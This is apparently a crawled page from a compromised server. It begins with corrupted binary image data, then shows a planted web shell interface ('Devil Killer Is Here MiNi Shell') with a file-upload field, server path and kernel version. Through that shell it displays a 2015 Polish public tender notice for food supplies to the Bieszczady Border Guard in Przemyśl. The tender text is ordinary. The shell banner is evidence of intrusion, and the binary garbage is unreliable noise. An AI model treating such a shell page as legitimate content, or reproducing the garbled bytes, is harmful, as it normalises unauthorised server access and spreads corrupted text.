JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/179725-N-2015.html

<p class="kh_header"><b>Przemyśl: Dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu</b><br>
<b>Numer ogłoszenia: 179725 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bieszczadzki Oddział Straży Granicznej , ul. Adama Mickiewicza 34, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6732153, 6732087, faks 016 6763271.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bieszczadzki.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu. 
Szczegółowy opis przedmiotu zamówienia zawierają tabele nr 1 - dla Pakietu I, tabela nr 2 - dla Pakietu II i tabela nr 3 - dla Pakietu III dołączone do Druku ofertowego wg. formularza stanowiącego Załącznik nr 1 do SIWZ .
Jeżeli w SIWZ do opisania przedmiotu zamówienia użyto parametrów, oznaczeń wskazujących konkretnego producenta, konkretny produkt lub wskazano pochodzenie produktu, znaki towarowe itp., o których mowa w art. 30 ustawy, Zamawiający dopuszcza zastosowanie produktów równoważnych, pod warunkiem, że oferowane przez niego produkty spełniają wymagania określone przez Zamawiającego na co najmniej takim samym poziomie (nie gorszym), co opisany przez Zamawiającego w SIWZ.
W przypadku sytuacji o której mowa w tym punkcie, Zamawiający wymaga aby Wykonawca w tabelach dołączonych do druku ofertowego umieścił nazwę oferowanego produktu oraz producenta.
Jeżeli Wykonawca w dołączonych tabelach nie wpisze nazwy oferowanego produktu oraz producenta, wówczas Zamawiający uzna, iż Wykonawca zaoferował produkt o nazwie wskazanej przez Zamawiającego.
Zamawiający wymaga aby:
a)	Wykonawca dostarczał artykuły spożywcze spełniające wymogi jakościowe dla gatunku I i sanitarno - higieniczne, odpowiadające obowiązującym przepisom oraz wolne od wad tj.: kształt i wygląd zewnętrzny powinien być charakterystyczny dla danego rodzaju asortymentu. Smak i zapach powinien być charakterystyczny dla danego rodzaju wyrobu. Niedopuszczalny jest smak i zapach obcy. 
b)	Wykonawca dostarczał towar w oryginalnych opakowaniach jednostkowych i zbiorczych, wykonanych z materiałów przeznaczonych do kontaktu z żywnością, które mają mieć na opakowaniu czytelne oznaczenia fabryczne tzn. rodzaj, nazwę wyrobu, ilość, datę produkcji, termin przydatności do spożycia lub termin minimalnej trwałości, nazwę i adres producenta oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego,
c)	Wykonawca dostarczał artykuły spożywcze, które winne posiadać dla sortymentu określonego w Tabeli nr 1 poz. 1 co najmniej 14 dni okresu przydatności do spożycia, natomiast dla pozostałego asortymentu określonego w Tabeli nr 1 poz. 2 - 88 oraz asortymentu wyszczególnionego w Tabeli nr 2 i 3 co najmniej 90 dni okresu przydatności do spożycia.
Wykonawca będzie dostarczał towar do siedziby Zamawiającego na własny koszt i ryzyko, jego własnym transportem, przy zachowaniu odpowiednich reżimów sanitarnych wymaganych do przewozu żywności.
Zamawiający będzie składał zamówienia telefonicznie lub faxem najpóźniej na jeden dzień przed dostawą.
Zamówienia realizowane będą przeciętnie trzy razy w tygodniu,  w godzinach od 0600 do godz. 1200. Zamawiający zastrzega sobie prawo zwiększenia częstotliwości dostaw.
Zamawiający zastrzega sobie prawo w sytuacjach szczególnych korekty ilościowej i asortymentowej zamówienia najpóźniej do godz. 8.00 w dniu dostawy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia przez Wykonawcę ww. warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia przez Wykonawcę ww. warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia przez Wykonawcę ww. warunku Zamawiający wymaga by Wykonawca dysponował co najmniej jednym środkiem transportu dopuszczonym do przewozu żywności zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594 tekst jednolity) oraz innymi aktualnie obowiązującymi przepisami prawa w zakresie przedmiotu zamówienia. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia przez Wykonawcę ww. warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia przez Wykonawcę ww. warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument właściwej Państwowej Inspekcji Sanitarnej lub Inspekcji Weterynaryjnej potwierdzający, iż Wykonawca ze względu na charakter prowadzonej działalności, w zakresie przedmiotu zamówienia znajduje się pod stałym nadzorem Inspektora Sanitarnego lub Inspektora Weterynaryjnego, spełnia wymogi dotyczące standardów higieniczno - sanitarnych oraz ma wdrożony system bezpieczeństwa  żywności HACCP zgodnie z ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594 tekst jednolity)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo - w przypadku podpisania oferty wraz z innymi dokumentami oraz oświadczenia za zgodność z oryginałem kopii dokumentów przez osobę/osoby nie wymienione w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy. Z treści pełnomocnictwa musi wynikać, iż umocowana osoba działa w imieniu i na rzecz Wykonawcy, oraz że została upoważniona do składania oświadczeń woli, w tym do podpisywania wszelkich dokumentów związanych z postępowaniem przetargowym.
Pełnomocnictwo należy złożyć w oryginale lub w formie kopii potwierdzonej notarialnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94.00</li>
<li>2 - Termin płatności - 6.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy p.z.p. Zamawiający dopuszcza możliwość zmiany umowy o zamówienie publiczne w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w niżej podanym zakresie:
a.	Zamawiający zastrzega sobie możliwość realizacji zamówienia w mniejszych ilościach w poszczególnych pozycjach z zakresu rzeczowego przedmiotu umowy w zależności od faktycznych potrzeb Zamawiającego,
b.	Zamawiający dopuszcza zwiększenie ilości zamawianego asortymentu w poszczególnych pozycjach do 20%, w przypadkach wcześniejszego zrealizowania poszczególnych asortymentów niezbędnych do prawidłowego żywienia osób osadzonych w strzeżonym ośrodku dla cudzoziemców przy zachowaniu ogólnej wartości umowy.
c.	Zamawiający dopuszcza zmianę wartości brutto umowy w przypadkach:
- zmiany stawki podatku VAT, o kwotę wynikającą z zmiany stawek tego podatku obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy,
- zmiany ceny brutto za jednostkę miary przedmiotu zamówienia objętego umową po okresie 3 miesięcy od daty obowiązywania umowy. Po tym terminie waloryzacja może odbywać się na podstawie pisemnego uzasadnionego wniosku Wykonawcy lub Zamawiającego do wysokości wskaźnika zmiany cen usług i towarów konsumpcyjnych ogłaszanych po zakończeniu każdego kwartału w Monitorze Polskim przez Prezesa GUS</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bieszczadzki.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bieszczadzki Oddział Straży Granicznej, ul. Mickiewicza 34, 37-700 Przemyśl, Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2015 godzina 09:30, miejsce: Bieszczadzki Oddział Straży Granicznej, ul. Mickiewicza 34, 37-700 Przemyśl, Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu - Pakiet I zamówienia, zgodnie z Tabelą nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu. 
Szczegółowy opis przedmiotu zamówienia zawiera Tabela nr 1 dołączona do Druku ofertowego wg. formularza stanowiącego Załącznik nr 1 do SIWZ .
Zamawiający wymaga aby:
a)	Wykonawca dostarczał artykuły spożywcze spełniające wymogi jakościowe dla gatunku I          i sanitarno - higieniczne, odpowiadające obowiązującym przepisom oraz wolne od wad tj.: kształt i wygląd zewnętrzny powinien być charakterystyczny dla danego rodzaju asortymentu. Smak i zapach powinien być charakterystyczny dla danego rodzaju wyrobu. Niedopuszczalny jest smak i zapach obcy. 
b)	Wykonawca dostarczał towar w oryginalnych opakowaniach jednostkowych i zbiorczych, wykonanych z materiałów przeznaczonych do kontaktu z żywnością, które mają mieć na opakowaniu czytelne oznaczenia fabryczne tzn. rodzaj, nazwę wyrobu, ilość, datę produkcji, termin przydatności do spożycia lub termin minimalnej trwałości, nazwę i adres producenta oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego,
c)	Wykonawca dostarczał artykuły spożywcze, które winne posiadać dla sortymentu określonego w Tabeli nr 1 poz. 1 co najmniej 14 dni okresu przydatności do spożycia, natomiast dla pozostałego asortymentu określonego w Tabeli nr 1 poz. 2 - 88 co najmniej 90 dni okresu przydatności do spożycia.
Wykonawca będzie dostarczał towar do siedziby Zamawiającego na własny koszt i ryzyko, jego własnym transportem, przy zachowaniu odpowiednich reżimów sanitarnych wymaganych do przewozu żywności.
Zamawiający będzie składał zamówienia telefonicznie lub faxem najpóźniej na jeden dzień przed dostawą.
Zamówienia realizowane będą przeciętnie trzy razy w tygodniu,  w godzinach od 06.00 do godz. 12.00. Zamawiający zastrzega sobie prawo zwiększenia częstotliwości dostaw.
Zamawiający zastrzega sobie prawo w sytuacjach szczególnych korekty ilościowej i asortymentowej zamówienia najpóźniej do godz. 8.00 w dniu dostawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.80.00-9, 03.21.22.13-6, 03.22.12.10-1, 03.14.21.00-9, 15.61.30.00-8, 15.85.11.00-9, 15.33.15.00-2, 15.33.14.62-3, 15.33.14.27-6, 15.83.12.00-4, 15.86.20.00-8, 15.41.11.00-3, 15.33.22.90-3, 15.88.40.00-8, 15.32.18.00-2, 15.87.12.70-7, 15.84.10.00-5, 15.87.12.50-1, 15.87.23.00-4, 15.89.14.10-7, 15.87.24.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94.00</li>
<li>2. Termin płatności - 6.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów spożywczych dla Bieszczadzkiego Oddziały Straży Granicznej w Przemyślu - Pakiet II zamówienia, zgodnie z Tabelą nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu. 
Szczegółowy opis przedmiotu zamówienia zawiera Tabela nr 2 - dla Pakietu II, dołączona do Druku ofertowego wg. formularza stanowiącego Załącznik nr 1 do SIWZ .
Jeżeli w SIWZ do opisania przedmiotu zamówienia użyto parametrów, oznaczeń wskazujących konkretnego producenta, konkretny produkt lub wskazano pochodzenie produktu, znaki towarowe itp., o których mowa w art. 30 ustawy, Zamawiający dopuszcza zastosowanie produktów równoważnych, pod warunkiem, że oferowane przez niego produkty spełniają wymagania określone przez Zamawiającego na co najmniej takim samym poziomie (nie gorszym), co opisany przez Zamawiającego w SIWZ.
W przypadku sytuacji o której mowa w tym punkcie, Zamawiający wymaga aby Wykonawca w tabeli dołączonej do druku ofertowego umieścił nazwę oferowanego produktu oraz producenta.
Jeżeli Wykonawca w dołączonej tabeli nie wpisze nazwy oferowanego produktu oraz producenta, wówczas Zamawiający uzna, iż Wykonawca zaoferował produkt o nazwie wskazanej przez Zamawiającego.
Zamawiający wymaga aby:
a)	Wykonawca dostarczał artykuły spożywcze spełniające wymogi jakościowe dla gatunku I i sanitarno - higieniczne, odpowiadające obowiązującym przepisom oraz wolne od wad tj.: kształt i wygląd zewnętrzny powinien być charakterystyczny dla danego rodzaju asortymentu. Smak i zapach powinien być charakterystyczny dla danego rodzaju wyrobu. Niedopuszczalny jest smak i zapach obcy. 
b)	Wykonawca dostarczał towar w oryginalnych opakowaniach jednostkowych i zbiorczych, wykonanych z materiałów przeznaczonych do kontaktu z żywnością, które mają mieć na opakowaniu czytelne oznaczenia fabryczne tzn. rodzaj, nazwę wyrobu, ilość, datę produkcji, termin przydatności do spożycia lub termin minimalnej trwałości, nazwę i adres producenta oraz inne oznakowania zgodne z obowiązującymi w tym zakresie przepisami prawa żywnościowego,
c)	Wykonawca dostarczał artykuły spożywcze, które winne posiadać dla sortymentu określonego w Tabeli nr 2 co najmniej 90 dni okresu przydatności do spożycia.
Wykonawca będzie dostarczał towar do siedziby Zamawiającego na własny koszt i ryzyko, jego własnym transportem, przy zachowaniu odpowiednich reżimów sanitarnych wymaganych do przewozu żywności.
Zamawiający będzie składał zamówienia telefonicznie lub faxem najpóźniej na jeden dzień przed dostawą.
Zamówienia realizowane będą przeciętnie trzy razy w tygodniu,  w godzinach od 06.00 do godz. 12.00. Zamawiający zastrzega sobie prawo zwiększenia częstotliwości dostaw.
Zamawiający zastrzega sobie prawo w sytuacjach szczególnych korekty ilościowej
i asortymentowej zamówienia najpóźniej do godz. 8.00 w dniu dostawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.82.12.00-1, 15.83.12.00-4, 15.84.23.00-5, 15.86.41.00-3, 15.86.11.00-2, 03.14.21.00-9, 15.51.10.00-3, 15.82.00.00-2, 15.32.12.00-6, 15.32.16.00-0, 15.32.11.00-5, 15.51.00.00-6, 15.98.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94.00</li>
<li>2. Termin płatności - 6.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów spożywczych dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu - Pakiet III zamówienia, zgodnie z Tabelą nr 3.</p>
